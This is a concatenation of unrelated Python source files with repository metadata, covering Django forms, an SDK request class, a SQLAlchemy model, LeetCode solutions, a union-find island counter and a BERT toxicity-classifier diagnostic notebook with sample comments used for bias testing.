def batch_insert(self,sql,row,step,is_auto=True,end=False):
if end:
if len(self._insert_values)!=0:
logging.info("insert {:}th data into database,final insert.".format(self._insert_index))
self.insert_database(sql,self._insert_values)
else:
self._insert_index+=1
if is_auto:
row[0] = self._insert_index
self._insert_values.append(tuple(row))
if self._insert_index%step==0:
logging.info("insert {:}th data into database".format(self._insert_index))
self.insert_database(sql,self._insert_values)
self._insert_values=[]
def get_insert_count(self):
return self._insert_index
def execute_del_update(self,sql):
self._cursor.execute(sql)
self._db.commit()
logging.debug("execute delete or update sql {:}.".format(sql))
def execute_sql(self,sql):
self._cursor.execute(sql)
self._db.commit()
logging.debug("execute sql {:}.".format(sql))
def close_db(self):
self._db.close()
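# Hedged usage sketch for dbop.batch_insert (SQL and rows are illustrative):
# buffer rows with an auto-numbered column 0, flush every `step` rows, then
# force a final flush with end=True:
#   db = dbop()
#   for row in rows:
#       db.batch_insert(insert_sql, [0] + list(row), step=1000)
#   db.batch_insert(insert_sql, None, step=1000, end=True)
#   db.close_db()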
def hist_2_bar(data,bins=50):
n,bins,patches = plt.hist(data,bins=bins)
return [x for x in bins[:-1]],[x for x in n]
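# Usage sketch (hypothetical data): hist_2_bar returns the left bin edges and
# the per-bin counts, ready for a bar plot:
#   xs, ys = hist_2_bar(np.random.randn(1000), bins=20)
#   plt.bar(xs, ys, width=xs[1] - xs[0])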
|
[
"[email protected]"
] | |
fc9e559deb7f5bddce6f8748ac93e3cc190dfb31
|
0130533e0f40a0f1cf476f519a3673b10ceabff3
|
/teste/maximo.py
|
b0fd9c6f4d4edd354a14ef1c57bb97f12fe9654e
|
[] |
no_license
|
danielcanuto/revisao_python
|
d79c8fbf475e1cea12ca9719d02868666e0591db
|
3dbd2af74c7cc94f8e1962acb4069f40d0e71772
|
refs/heads/main
| 2023-03-02T04:37:30.777336 | 2021-02-11T11:16:54 | 2021-02-11T11:16:54 | 337,031,753 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 141 |
py
|
def maior(x, y):
if x > y:
return x
else:
return y
def maximo(x, y, z):
a = maior(x, y)
return maior(a, z)
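# Usage sketch: maior(2, 7) -> 7; maximo(2, 7, 5) -> 7 (the largest of the three).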
|
[
"[email protected]"
] | |
abcfc7f85883e49ffa5113a31431886ddf533f5c
|
5b1b478b0e7b8069762855baa8a2a4f6ff48ebf4
|
/src/reviews/forms.py
|
bf83b29d371abc3b2b2686430c5fe69d7b383f5e
|
[
"MIT"
] |
permissive
|
junaidq1/greendot
|
9e4a0402fcee7182ca7531a0dd4a48edb43f79c5
|
cd9e7791523317d759e0f5f9cf544deff34a8c79
|
refs/heads/master
| 2020-04-06T06:54:07.994376 | 2016-09-11T18:33:15 | 2016-09-11T18:33:15 | 61,906,579 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,047 |
py
|
from django import forms
from .models import Review, Employee
from registration.forms import RegistrationFormUniqueEmail #this is to edit the registration redux form
# class ReviewForm(forms.ModelForm):
# class Meta:
# model = Review
# fields = [
# "content",
# "employee",
# "work_again",
# ]
#actual review post form
class ReviewForm2(forms.ModelForm):
class Meta:
model = Review
fields = ["length_working", "ques1", "ques2", "ques3","work_again", "content"]
# def content_clean(self):
# content = self.cleaned_data.get('content')
# print "jimmy"
# print len(content)
# if len(content) < 70:
# raise forms.ValidationError("Please provide a more impactful review")
# return content
#this form edits the registration redux form
class UserLevelRegistrationForm(RegistrationFormUniqueEmail):
LEVEL_CHOICES = (
('PPD', 'PPD'),
('BA', 'BA'),
('C', 'C'),
('SC', 'SC'),
('M', 'M'),
('SM', 'SM'),
('Other', 'other'),
)
OFFICE_CHOICES = (
('Kansas City', 'Kansas City'),
('Atlanta', 'Atlanta'),
('Austin', 'Austin'),
('Bengaluru', 'Bengaluru'),
('Boston', 'Boston'),
('Charlotte', 'Charlotte'),
('Chicago', 'Chicago'),
('Cincinnati', 'Cincinnati'),
('Cleveland', 'Cleveland'),
('Dallas', 'Dallas'),
('Denver', 'Denver'),
('Detroit', 'Detroit'),
('Gurgaon', 'Gurgaon'),
('Houston', 'Houston'),
('Los Angeles', 'Los Angeles'),
('McLean', 'McLean'),
('Miami', 'Miami'),
('Minneapolis', 'Minneapolis'),
('Mumbai', 'Mumbai'),
('New York City', 'New York City'),
('Orange County', 'Orange County'),
('Parsippany', 'Parsippany'),
('Philadelphia', 'Philadelphia'),
('Pittsburgh', 'Pittsburgh'),
('San Francisco', 'San Francisco'),
('Seattle', 'Seattle'),
('Other', 'other'),
)
ServiceArea_CHOICES = (
('S&O', 'S&O'),
('Tech', 'Tech'),
('Human Capital', 'Human Capital'),
)
level = forms.ChoiceField(choices=LEVEL_CHOICES, label="What is your level at the firm?")
office = forms.ChoiceField(choices=OFFICE_CHOICES, label="What office are you based out of?")
service_area = forms.ChoiceField(choices=ServiceArea_CHOICES, label="What Service Area are you a part of?")
# form to validate that person signing up knows the answer to the impact day question
class ValidationForm(forms.Form):
answer = forms.CharField()
class ContactForm(forms.Form):
username = forms.CharField(label="Please enter your username (if applicable)", required=False)
contact_email = forms.EmailField(label="Please provide a contact email")
message = forms.CharField(widget=forms.Textarea)
class AccessIssuesForm(forms.Form):
username = forms.CharField(label="Please enter your username", required=False)
contact_email = forms.EmailField(label="Please provide a contact email")
message = forms.CharField(label="Please describe the access issues you are having", widget=forms.Textarea)
class ReportDataForm(forms.Form):
DataReportChoices = (
('Incorrect', 'Incorrect practitioner data'),
('Missing', 'Missing practitioner data'),
)
data_issue = forms.ChoiceField(choices=DataReportChoices,
label="What kind of data issue would you like to report?")
practitioner_first_name = forms.CharField(label="First name of practitoner", max_length=120)
practitioner_last_name = forms.CharField(label="Last name of practitoner", max_length=120)
service_area = forms.CharField(label="Service Area of practitoner", max_length=120)
level = forms.CharField(label="Level of practitoner", max_length=120)
office = forms.CharField(label="Office of practitoner", max_length=120)
message = forms.CharField(label="Describe data issue", max_length=1500)
class PartnerForm(forms.Form):
service_area_options = (
('S&O', 'S&O'),
('Tech', 'Tech'),
('HCap', 'HCap'),
)
service_ar = forms.ChoiceField(choices=service_area_options,
label="What Service Area are you aligned with?")
message = forms.CharField(label="What makes you a good fit for the team?", widget=forms.Textarea)
contact_email = forms.EmailField(label="Email address")
|
[
"[email protected]"
] | |
e1c50ce55b94d0b8974045c6d12124d2db102332
|
21b39d50e4df56ea01453001845d1580729af1df
|
/jdcloud_sdk/services/redis/apis/DescribeClientListRequest.py
|
450146bb94baa2db571d11a497779f82c80cb4ac
|
[
"Apache-2.0"
] |
permissive
|
Tanc009/jdcloud-sdk-python
|
ef46eac7731aa8a1839b1fc1efd93249b7a977f0
|
8b045c99bc5b73ca7348e950b6f01e03a27982f5
|
refs/heads/master
| 2021-08-09T14:49:16.177709 | 2021-06-25T02:38:41 | 2021-06-25T02:38:41 | 141,714,695 | 0 | 0 |
Apache-2.0
| 2018-07-20T13:21:17 | 2018-07-20T13:21:16 | null |
UTF-8
|
Python
| false | false | 1,572 |
py
|
# coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest
class DescribeClientListRequest(JDCloudRequest):
"""
    Query the current list of client IPs
"""
def __init__(self, parameters, header=None, version="v1"):
super(DescribeClientListRequest, self).__init__(
'/regions/{regionId}/cacheInstance/{cacheInstanceId}/clientList', 'GET', header, version)
self.parameters = parameters
class DescribeClientListParameters(object):
def __init__(self, regionId, cacheInstanceId, ):
"""
        :param regionId: Region ID of the region where the Redis cache instance is located. Three regions are currently available: North China-Beijing, South China-Guangzhou and East China-Shanghai, with Region IDs cn-north-1, cn-south-1 and cn-east-2 respectively
        :param cacheInstanceId: ID of the Redis cache instance, the unique identifier used to access it
"""
self.regionId = regionId
self.cacheInstanceId = cacheInstanceId
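# Hedged usage sketch (the instance ID below is hypothetical):
#   parameters = DescribeClientListParameters('cn-north-1', 'redis-abc123')
#   request = DescribeClientListRequest(parameters)
# This builds a GET request for
# /regions/{regionId}/cacheInstance/{cacheInstanceId}/clientList.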
|
[
"[email protected]"
] | |
7c6e2ad300adefc46b95d659f9cefe698aeb499b
|
20f951bd927e4e5cde8ef7781813fcf0d51cc3ea
|
/fossir/modules/events/contributions/models/subcontributions.py
|
9ff806fba366acfa3d3ecfa78f127ae91c426fa9
|
[] |
no_license
|
HodardCodeclub/SoftwareDevelopment
|
60a0fbab045cb1802925d4dd5012d5b030c272e0
|
6300f2fae830c0c2c73fe0afd9c684383bce63e5
|
refs/heads/master
| 2021-01-20T00:30:02.800383 | 2018-04-27T09:28:25 | 2018-04-27T09:28:25 | 101,277,325 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,998 |
py
|
from __future__ import unicode_literals
from fossir.core.db import db
from fossir.core.db.sqlalchemy.attachments import AttachedItemsMixin
from fossir.core.db.sqlalchemy.descriptions import DescriptionMixin, RenderMode
from fossir.core.db.sqlalchemy.notes import AttachedNotesMixin
from fossir.core.db.sqlalchemy.util.queries import increment_and_get
from fossir.util.locators import locator_property
from fossir.util.string import format_repr, return_ascii
def _get_next_friendly_id(context):
"""Get the next friendly id for a sub-contribution."""
from fossir.modules.events.contributions.models.contributions import Contribution
contribution_id = context.current_parameters['contribution_id']
assert contribution_id is not None
return increment_and_get(Contribution._last_friendly_subcontribution_id, Contribution.id == contribution_id)
def _get_next_position(context):
"""Get the next menu entry position for the event."""
contribution_id = context.current_parameters['contribution_id']
res = db.session.query(db.func.max(SubContribution.position)).filter_by(contribution_id=contribution_id).one()
return (res[0] or 0) + 1
class SubContribution(DescriptionMixin, AttachedItemsMixin, AttachedNotesMixin, db.Model):
__tablename__ = 'subcontributions'
__table_args__ = (db.Index(None, 'friendly_id', 'contribution_id', unique=True),
{'schema': 'events'})
PRELOAD_EVENT_ATTACHED_ITEMS = True
PRELOAD_EVENT_NOTES = True
ATTACHMENT_FOLDER_ID_COLUMN = 'subcontribution_id'
possible_render_modes = {RenderMode.html, RenderMode.markdown}
default_render_mode = RenderMode.markdown
id = db.Column(
db.Integer,
primary_key=True
)
#: The human-friendly ID for the sub-contribution
friendly_id = db.Column(
db.Integer,
nullable=False,
default=_get_next_friendly_id
)
contribution_id = db.Column(
db.Integer,
db.ForeignKey('events.contributions.id'),
index=True,
nullable=False
)
position = db.Column(
db.Integer,
nullable=False,
default=_get_next_position
)
title = db.Column(
db.String,
nullable=False
)
duration = db.Column(
db.Interval,
nullable=False
)
is_deleted = db.Column(
db.Boolean,
nullable=False,
default=False
)
#: External references associated with this contribution
references = db.relationship(
'SubContributionReference',
lazy=True,
cascade='all, delete-orphan',
backref=db.backref(
'subcontribution',
lazy=True
)
)
#: Persons associated with this contribution
person_links = db.relationship(
'SubContributionPersonLink',
lazy=True,
cascade='all, delete-orphan',
backref=db.backref(
'subcontribution',
lazy=True
)
)
# relationship backrefs:
# - attachment_folders (AttachmentFolder.subcontribution)
# - contribution (Contribution.subcontributions)
# - legacy_mapping (LegacySubContributionMapping.subcontribution)
# - note (EventNote.subcontribution)
def __init__(self, **kwargs):
# explicitly initialize this relationship with None to avoid
# an extra query to check whether there is an object associated
# when assigning a new one (e.g. during cloning)
kwargs.setdefault('note', None)
super(SubContribution, self).__init__(**kwargs)
@property
def event(self):
return self.contribution.event
@locator_property
def locator(self):
return dict(self.contribution.locator, subcontrib_id=self.id)
@property
def is_protected(self):
return self.contribution.is_protected
@property
def session(self):
"""Convenience property so all event entities have it"""
return self.contribution.session if self.contribution.session_id is not None else None
@property
def timetable_entry(self):
"""Convenience property so all event entities have it"""
return self.contribution.timetable_entry
@property
def speakers(self):
return self.person_links
@speakers.setter
def speakers(self, value):
self.person_links = value.keys()
@property
def location_parent(self):
return self.contribution
def get_access_list(self):
return self.contribution.get_access_list()
def get_manager_list(self, recursive=False):
return self.contribution.get_manager_list(recursive=recursive)
@return_ascii
def __repr__(self):
return format_repr(self, 'id', is_deleted=False, _text=self.title)
def can_access(self, user, **kwargs):
return self.contribution.can_access(user, **kwargs)
def can_manage(self, user, role=None, **kwargs):
return self.contribution.can_manage(user, role, **kwargs)
|
[
"[email protected]"
] | |
6305acaf43a088e91df5df323d21cd70ced14c36
|
a062669a7f37412f016534ae30bd41e9efe6afa5
|
/product/migrations/0013_auto_20201127_0026.py
|
8b034f4bd8a91d3a1e265777d20c4ce041f762fb
|
[] |
no_license
|
techappg/meat_fun_backend
|
7c05045ae0ca6a442eb6e24693a800ca98447e9b
|
e16da0ec1ccfb583a43f534ad9fd6cb79fe1e6c1
|
refs/heads/main
| 2023-04-16T22:42:38.183722 | 2021-04-22T07:37:07 | 2021-04-22T07:37:07 | 360,430,038 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 396 |
py
|
# Generated by Django 3.1 on 2020-11-27 08:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('product', '0012_auto_20201127_0024'),
]
operations = [
migrations.AlterField(
model_name='contact_us',
name='mobile',
field=models.IntegerField(),
),
]
|
[
"[email protected]"
] | |
ed6a4ab01226c402541becc7afe28423eff22758
|
036a41c913b3a4e7ae265e22a672dd89302d3200
|
/0201-0300/0248/0248_Python_1.py
|
760cb2e6b8f7b3dda42f9d212933b86444a78d20
|
[] |
no_license
|
ChangxingJiang/LeetCode
|
e76f96ebda68d7ade53575354479cfc33ad4f627
|
a2209206cdd7229dd33e416f611e71a984a8dd9e
|
refs/heads/master
| 2023-04-13T15:23:35.174390 | 2021-04-24T05:54:14 | 2021-04-24T05:54:14 | 272,088,506 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,018 |
py
|
class Solution:
    # Given two bound digits, count the valid strobogrammatic digits between them
@staticmethod
def num1(low, high, middle=False):
if middle:
return len([str(i) for i in [0, 1, 8] if int(low) <= i <= int(high)])
else:
return len([str(i) for i in [0, 1, 6, 8, 9] if int(low) < i < int(high)])
    # Count strobogrammatic numbers with n digits
@staticmethod
def count(n, first):
if n == 0:
return 1
if n == 1:
return 3
if n == 2:
return 4 if first else 5
if first:
return 4 * Solution.count(n - 2, first=False)
else:
return 5 * Solution.count(n - 2, first=False)
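    # Why these factors: an n-digit strobogrammatic number is fixed by its first
    # ceil(n/2) digits; the leading digit has 4 choices ({1, 6, 8, 9}, no leading
    # zero) and every other mirrored pair has 5 ({0, 1, 6, 8, 9}), matching the
    # 4* and 5* recursions above.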
def strobogrammaticInRange(self, low: str, high: str) -> int:
        # digit -> its 180-degree rotation
reverse_lst = {
"0": "0",
"1": "1",
"6": "9",
"8": "8",
"9": "6"
}
# print("当前计算:", low, high)
# 如果顺序相反则返回0
if int(low) > int(high):
return 0
        # Handle the case where the two bounds are identical
if low == high:
return 1 if low == low[::-1] else 0
a, b = len(low), len(high)
        # Handle the case where both bounds have the same number of digits
        # e.g. (150-525) -> (150-199) + (200-499) + (500-525)
if a == b:
            # Find the first position where the two bounds differ
i = 0
while i < a and low[i] == high[i]:
i += 1
s = a // 2
            # Handle single-digit numbers
            # and the middle digit of odd-length numbers
if a == 1 or (a % 2 == 1 and i == s):
return self.num1(low[i], high[i], middle=True)
            # Handle positions before the middle digit
if (a % 2 == 0 and i < s) or (a % 2 == 1 and i < s):
ans = self.num1(low[i], high[i]) * self.count(a - (i + 1) * 2, first=False)
# print(low, high, "(", i, ")", "=",
# self.num1(low[i], high[i]), "*", self.count(a - (i + 1) * 2, first=False), "=", ans,
# "->",
# (low, low[:i + 1] + "9" * (a - i - 1)) if low[i] in reverse_lst else (),
# (high[:i + 1] + "0" * (a - i - 1), high) if high[i] in reverse_lst else ())
if low[i] in reverse_lst:
high2 = low[:i + 1] + "9" * (a - i - 1)
ans += self.strobogrammaticInRange(low, high2)
if high[i] in reverse_lst:
low2 = high[:i + 1] + "0" * (a - i - 1)
ans += self.strobogrammaticInRange(low2, high)
return ans
            # Handle positions after the middle digit
            ch = reverse_lst[low[s - (i - s + 1)] if a % 2 == 0 else low[s - (i - s)]]  # the digit forced by the mirrored position
            # Check whether the forced digit stays inside the bounds
if int(low[i]) < int(ch) < int(high[i]):
return 1
elif int(low[i]) == int(ch):
while i < a:
                    ch = reverse_lst[low[s - (i - s + 1)] if a % 2 == 0 else low[s - (i - s)]]  # the digit forced by the mirrored position
if int(ch) > int(low[i]):
return 1
elif int(ch) == int(low[i]):
i += 1
else:
return 0
return 1
elif int(ch) == int(high[i]):
while i < a:
                    ch = reverse_lst[low[s - (i - s + 1)] if a % 2 == 0 else low[s - (i - s)]]  # the digit forced by the mirrored position
if int(ch) < int(high[i]):
return 1
elif int(ch) == int(high[i]):
i += 1
else:
return 0
return 1
else:
return 0
        # Handle bounds with different numbers of digits
        # e.g. (50-4050) -> (50-99) + all 3-digit counts + (1000-4050)
else:
ans = 0
for i in range(a + 1, b):
ans += self.count(i, first=True)
# print(low, high, "=", ans, "->", (low, "9" * a), ("1" + "0" * (b - 1), high))
return (ans +
self.strobogrammaticInRange(low, "9" * a) +
self.strobogrammaticInRange("1" + "0" * (b - 1), high))
if __name__ == "__main__":
print(Solution().strobogrammaticInRange(low="50", high="100")) # 3
print(Solution().strobogrammaticInRange(low="0", high="9")) # 3
print(Solution().strobogrammaticInRange(low="100", high="50")) # 0
print(Solution().strobogrammaticInRange(low="1", high="0")) # 0
print(Solution().strobogrammaticInRange(low="0", high="100")) # 7
print(Solution().strobogrammaticInRange(low="100", high="1000")) # 12
print(Solution().strobogrammaticInRange(low="0", high="1680")) # 21
print(Solution().strobogrammaticInRange(low="0", high="2147483647")) # 3124
|
[
"[email protected]"
] | |
9277ddc026afe786dbfa6c7fce9b98dc97c38959
|
19cec240505e27546cb9b10104ecb16cc2454702
|
/linux/app/web/python/wikicode/dc/__init__.py
|
92f91ec3adc810b7ed3614687a82c4219108541c
|
[] |
no_license
|
imosts/flume
|
1a9b746c5f080c826c1f316a8008d8ea1b145a89
|
a17b987c5adaa13befb0fd74ac400c8edbe62ef5
|
refs/heads/master
| 2021-01-10T09:43:03.931167 | 2016-03-09T12:09:53 | 2016-03-09T12:09:53 | 53,101,798 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,572 |
py
|
import sys, socket, os, wikicode
import flume.flmos as flmo
from wikicode import to_rpc_proxy
class Declassifier (object):
def config (self):
"""
This is a CGI program used to configure the declassifier
"""
import wikicode
class Config (wikicode.extension):
def run (self):
self.send_page ("Generic DC Setup")
wikicode.run_extension (Config)
def declassify_ok (self, *args):
"""
This is a method that returns True or False depending on whether
the user with uid <owner_uid> is willing to declassify to user <recipient_uid>
"""
raise NotImplementedError, 'subclass must implement this method'
def run (self):
if len (sys.argv) > 1:
tagval = int (sys.argv[1])
instance_tagval = int (sys.argv[2])
owner_name = sys.argv[3]
owner_uid = int (sys.argv[4])
devel_homedir = sys.argv[5]
recipient_uid = int (sys.argv[6])
rpc_fd, rpc_proxy = to_rpc_proxy (os.environ[wikicode.RPC_TAG_ENV])
if self.declassify_ok (tagval, instance_tagval,
owner_name, owner_uid,
devel_homedir,
recipient_uid, rpc_fd, rpc_proxy):
rpc_proxy.set_dc_ok (True)
sys.exit (0)
else:
sys.exit (-1)
else:
self.config ()
if __name__ == '__main__':
obj = Declassifier ()
obj.run ()
|
[
"imosts"
] |
imosts
|
3e200464fcd0c7743e17cb6998f1810928aa115a
|
a2b6bc9bdd2bdbe5871edb613065dd2397175cb3
|
/Cookbook/Array/岛屿数量.py
|
571395c6c2f6f2f328b0dda10d09b4a6f34e41e6
|
[] |
no_license
|
Asunqingwen/LeetCode
|
ed8d2043a31f86e9e256123439388d7d223269be
|
b7c59c826bcd17cb1333571eb9f13f5c2b89b4ee
|
refs/heads/master
| 2022-09-26T01:46:59.790316 | 2022-09-01T08:20:37 | 2022-09-01T08:20:37 | 95,668,066 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,635 |
py
|
'''
Given an m x n 2D grid made of '1's (land) and '0's (water), count the number of islands.
An island is surrounded by water and is formed by connecting adjacent land cells
horizontally and/or vertically.
You may also assume that all four edges of the grid are surrounded by water.
Example 1:
Input: grid = [
["1","1","1","1","0"],
["1","1","0","1","0"],
["1","1","0","0","0"],
["0","0","0","0","0"]
]
Output: 1
Example 2:
Input: grid = [
["1","1","0","0","0"],
["1","1","0","0","0"],
["0","0","1","0","0"],
["0","0","0","1","1"]
]
Output: 3
Constraints:
m == grid.length
n == grid[i].length
1 <= m, n <= 300
grid[i][j] is '0' or '1'
'''
from typing import List
class UnionFind:
def __init__(self,grid):
row, col = len(grid), len(grid[0])
self.count = 0
self.parent = [-1] * (row * col)
self.rank = [0] * (row * col)
for i in range(row):
for j in range(col):
if grid[i][j] == "1":
self.parent[i * col + j] = i * col + j
self.count += 1
def find(self, i):
if self.parent[i] == i:
return i
        self.parent[i] = self.find(self.parent[i]) # path compression
return self.parent[i]
def union(self, x, y):
rootx = self.find(x)
rooty = self.find(y)
if rootx != rooty:
            if self.rank[rootx] < self.rank[rooty]: # union by rank: attach the shallower tree under the deeper root
rootx, rooty = rooty, rootx
self.parent[rooty] = rootx
if self.rank[rootx] == self.rank[rooty]:
self.rank[rootx] += 1
            self.count -= 1 # every successful union merges two islands into one
def getCount(self):
return self.count
class Solution:
def numIslands(self, grid: List[List[str]]) -> int:
row = len(grid)
if row == 0:
return 0
col = len(grid[0])
uf = UnionFind(grid)
for r in range(row):
for c in range(col):
if grid[r][c] == "1":
grid[r][c] = "0"
for x, y in ((r - 1, c), (r + 1, c), (r, c - 1), (r, c + 1)):
if 0 <= x < row and 0 <= y < col and grid[x][y] == "1":
uf.union(r * col + c, x * col + y)
return uf.getCount()
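        # The grid is consumed in place ('1' -> '0') while each land cell is
        # unioned with its four neighbours, so getCount() ends up counting the
        # connected land components, i.e. the islands.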
if __name__ == '__main__':
grid = [
["1", "1", "1", "1", "0"],
["1", "1", "0", "1", "0"],
["1", "1", "0", "0", "0"],
["0", "0", "0", "0", "0"]
]
sol = Solution()
print(sol.numIslands(grid))
|
[
"[email protected]"
] | |
8b822886de793fad5cc78d1bdeeab56f9dfb7197
|
85f1488f3d0996b83292f74b3672793f2778503f
|
/notebooks/Model Diagnostics.py
|
96d24d2bbf464d6e372c397f7b713a044f8955dd
|
[] |
no_license
|
ceshine/jigsaw-toxic-2019
|
33f66d6643aeeeb20599ab95368ce2c1f6500543
|
34d5df28e1b820725f964fbbdfe039daea31c0d7
|
refs/heads/master
| 2022-02-22T10:50:51.444794 | 2019-08-04T04:13:00 | 2019-08-04T04:13:00 | 198,053,856 | 7 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,796 |
py
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import sys
sys.path.append("..")
# In[2]:
from pathlib import Path
from functools import partial
import numpy as np
import pandas as pd
import torch
import joblib
from torch.utils.data import DataLoader
from toxic.inference_bert import get_token_ids
from toxic.dataset import AUX_COLUMNS, ToxicDataset, collate_examples, SortSampler
from toxic.common import ToxicBot
from toxic.metric import ToxicMetric
# In[3]:
MODEL_PATH = Path("../data/cache/")
DEVICE = "cuda:0"
# In[4]:
tokenizer = joblib.load(str(MODEL_PATH / "bert-base-uncased_tokenizer.jbl"))
model = torch.load(str(MODEL_PATH / "bert-base-uncased_-1_yuval_220_f0.pth")).to(DEVICE)
# In[5]:
collate_fn = partial(
collate_examples,
truncate_len=220,
pad=0,
closing_id=tokenizer.vocab["[SEP]"],
mode="both"
)
# 
# [source](https://twitter.com/jessamyn/status/900867154412699649)
# In[6]:
test_text = [
"I am a man",
"I am a woman",
"I am a lesbian",
"I am gay man",
"I am dyke",
"I am a white man",
"I am a gay woman",
"I am a white woman",
"I am a gay white man",
"I am a black man",
"I am a gay white man",
"I am a gay black man",
"I am a black woman",
"I am a gay black woman"
]
df = pd.DataFrame(dict(comment_text=test_text))
# In[7]:
tokens = get_token_ids(
df, tokenizer, is_bert=True)
test_ds = ToxicDataset(df, tokens, labeled=False)
test_loader = DataLoader(
test_ds,
collate_fn=collate_fn,
batch_size=32,
num_workers=0,
pin_memory=True
)
# In[8]:
with torch.no_grad():
results = []
for batch, _ in test_loader:
results.append(model(batch.cuda()))
results = torch.sigmoid(torch.cat(results)) * 100
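# sigmoid maps the raw logits to probabilities; *100 rescales them to percent
# for the prediction tables below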
results.size()
# In[9]:
predictions = pd.DataFrame(results.cpu().numpy(), columns=AUX_COLUMNS)
predictions["text"] = df["comment_text"].values
predictions.shape
# In[10]:
pd.set_option('display.float_format', lambda x: '%.2f' % x)
# In[11]:
predictions.columns
# In[12]:
predictions[["text", "target", "identity_attack", "female", "homosexual_gay_or_lesbian", "black", "white"]].rename(
columns={"target": "toxic", "homosexual_gay_or_lesbian":"homosexual"})
# ## Other random examples
# In[23]:
test_text = [
"Pretty sad really. Thousands come out to protest Trump who's in another country......and all those NDP and Green members - who were the driving force behind Proportional Representation - couldn't find the time to get out to support their own cause. That said, you can bet that Trudeau has alredy lost a good portion of that NDP/Green vote. The guy's a liar. Period.",
"Idiots.",
"Then put them in jail until they decide to cooperate. This is ridiculous....",
"\"He’s a proven liar. Why would you believe anything he has to say?\"\n\nExactly.\nThat\'s why I do not listen to a word Donnie says.",
"Fascinating young woman, impressive work. It reminds me of one of the reasons I love Alaska so much —\xa0the people Alaska attracts are often just as extraordinary as the landscape itself. Great article, thank you.",
"Well, at least the Russians are white, for heaven's sakes. I'd rather have to live next to a nice white drunk Russian than a black Muslim Kenyan whose children's names are Satanic anagrams.",
"Was I posted yesterday, it is interesting to note that under Session's watch only three black people have been appointed in Alabama for the federal courts. This despite the fact that black people make up over 39% of the population of that state. What underlines this reality must be Session's unconscious, if not conscious, attitude towards blacks in general."
]
df = pd.DataFrame(dict(comment_text=test_text))
# In[24]:
tokens = get_token_ids(
df, tokenizer, is_bert=True)
print([len(x) for x in tokens])
test_ds = ToxicDataset(df, tokens, labeled=False)
test_loader = DataLoader(
test_ds,
collate_fn=collate_fn,
batch_size=32,
num_workers=0,
pin_memory=True
)
with torch.no_grad():
results = []
for batch, _ in test_loader:
results.append(model(batch.cuda()))
results = torch.sigmoid(torch.cat(results)) * 100
results.size()
predictions = pd.DataFrame(results.cpu().numpy(), columns=AUX_COLUMNS)
predictions["text"] = df["comment_text"].values
predictions[["text", "target", "identity_attack", "female", "homosexual_gay_or_lesbian", "black", "white"]].rename(
columns={"target": "toxic", "homosexual_gay_or_lesbian":"homosexual"})
# ## Validate
# Make sure the model is set up correctly.
# In[80]:
df_valid, tokens_valid = joblib.load(str(MODEL_PATH / "valid_bert-base-uncased_-1_yuval_f0.jbl"))
idx = np.random.choice(np.arange(df_valid.shape[0]), 32 * 1000)
df_valid, tokens_valid = df_valid.iloc[idx].reset_index(drop=True), tokens_valid[idx]
valid_ds = ToxicDataset(df_valid, tokens_valid, labeled=True)
val_sampler = SortSampler(valid_ds, key=lambda x: len(valid_ds.tokens[x]))
df_valid = df_valid.iloc[list(iter(val_sampler))]
print(df_valid.target.describe())
# In[81]:
valid_loader = DataLoader(
valid_ds,
collate_fn=collate_fn,
batch_size=64,
num_workers=0,
pin_memory=True,
sampler=val_sampler
)
# In[82]:
bot = ToxicBot(
checkpoint_dir=Path("/tmp/"),
log_dir=Path("/tmp/"),
model=model, train_loader=None,
val_loader=None, optimizer=None,
echo=False,
criterion=None,
avg_window=100,
callbacks=[],
pbar=False,
use_tensorboard=False,
device=DEVICE
)
valid_pred, valid_y = bot.predict(valid_loader, return_y=True)
# In[84]:
pd.set_option('precision', 4)
metric = ToxicMetric(df_valid)
metric(valid_y, valid_pred)
# In[ ]:
|
[
"[email protected]"
] | |
fa091d4a5b67cc3425553a4c3c7993b379d5a42c
|
2a2505108cd429d39746050d0100f4963dcd9c69
|
/src/compas/geometry/bbox/__init__.py
|
b19dd1d59cd854d5d9397b2cf4ef284c580ed6d6
|
[
"MIT"
] |
permissive
|
adacko/compas
|
677095bea007c22a98b44af3281131b445cb1ae1
|
47c443ad3825897ec7ed932ec20734c2f08ef120
|
refs/heads/master
| 2020-07-23T00:55:51.348907 | 2019-09-09T16:44:18 | 2019-09-09T16:44:18 | 207,390,442 | 0 | 1 |
MIT
| 2019-09-09T19:40:41 | 2019-09-09T19:40:41 | null |
UTF-8
|
Python
| false | false | 260 |
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import compas
from .bbox import *
if not compas.IPY:
from .bbox_numpy import *
__all__ = [name for name in dir() if not name.startswith('_')]
|
[
"[email protected]"
] | |
c26747d4798c12a9061590246550915c3f49b876
|
f7c7063e1a22b773a271a953c013a3c5303b70b3
|
/src/litter_trap.py
|
f5802491a1ff00f278838b9b59f2b0dfe66141a0
|
[] |
no_license
|
Ewan82/ah_data
|
e0cce8fffafd91eb6fca8ce6af602d3230535f87
|
d5961f284187acda8d1317bb4fd50f32c85bb591
|
refs/heads/master
| 2021-01-19T01:55:47.530127 | 2016-11-04T11:07:09 | 2016-11-04T11:07:09 | 40,532,005 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 277 |
py
|
import numpy as np
import matplotlib.mlab as mlab
def convert_csv2rec(file_no):
return mlab.csv2rec('../litter_traps/litterscans/file0'+str(file_no)+'.csv')
def remove_false_data(area_arr, tol=2.0):
idx = np.where(area_arr < tol)
return np.delete(area_arr, idx)
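# Usage sketch (hypothetical values): entries below tol are treated as scan
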